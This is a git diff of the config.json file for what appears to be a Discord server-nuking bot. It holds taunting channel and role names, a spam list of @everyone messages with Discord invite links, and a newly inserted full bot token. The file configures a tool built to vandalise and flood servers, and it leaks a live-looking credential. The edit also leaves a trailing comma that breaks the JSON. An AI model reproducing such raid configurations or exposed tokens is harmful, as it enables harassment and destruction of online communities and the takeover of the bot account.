--- a/config.json
+++ b/config.json
@@ -1,5 +1,5 @@
 {
-"bot_token": "",
+"bot_token": "OTgwMzY3NTY4MTYwMzA5Mjg4.GPj2Jn.3ugHYM-gA_VZh5iv6hg047CaD8IUrB2x-xmoGY",
 "prefix": "$",
 "channelnames": "psycho runs you", 
 "channelnames":"Get ran", 
@@ -16,5 +16,5 @@
 "channelnames":"kinda got beamed by psycho", 
 "rolenames": "psycho was here ",
 "spam_text": ["@everyone psycho runs you ", "@everyone Boom! Get Nuked", "@everyone psycho is cool", "@everyone Get Beamed ", "@everyone join the discord https://discord.gg/AkUNj9aYdY"
-, "@everyone join the discord https://discord.gg/AkUNj9aYdY", "@everyone join the discord https://discord.gg/AkUNj9aYdY", "@everyone join the discord https://discord.gg/mzGdn7MrTB", "@everyone join the discord https://discord.gg/mzGdn7MrTB", "@everyone join the discord https://discord.gg/mzGdn7MrTB", "@everyone join the discord https://discord.gg/mzGdn7MrTB", "@everyone join the discord https://discord.gg/mzGdn7MrTB","psycho runs you", "Get ran", "psycho" , "oops Beamed","psycho Beamed You","Shoulda Listened","Get beamed clowns", "Beamed by psycho", "oops got nuked","I run you","beamed by psycho","I run you","kinda got beamed by psycho", "psycho was here "]
+, "@everyone join the discord https://discord.gg/AkUNj9aYdY", "@everyone join the discord https://discord.gg/AkUNj9aYdY", "@everyone join the discord https://discord.gg/mzGdn7MrTB", "@everyone join the discord https://discord.gg/mzGdn7MrTB", "@everyone join the discord https://discord.gg/mzGdn7MrTB", "@everyone join the discord https://discord.gg/mzGdn7MrTB", "@everyone join the discord https://discord.gg/mzGdn7MrTB","psycho runs you", "Get ran", "psycho" , "oops Beamed","psycho Beamed You","Shoulda Listened","Get beamed clowns", "Beamed by psycho", "oops got nuked","I run you","beamed by psycho","I run you","kinda got beamed by psycho", "psycho was here ",]
 }
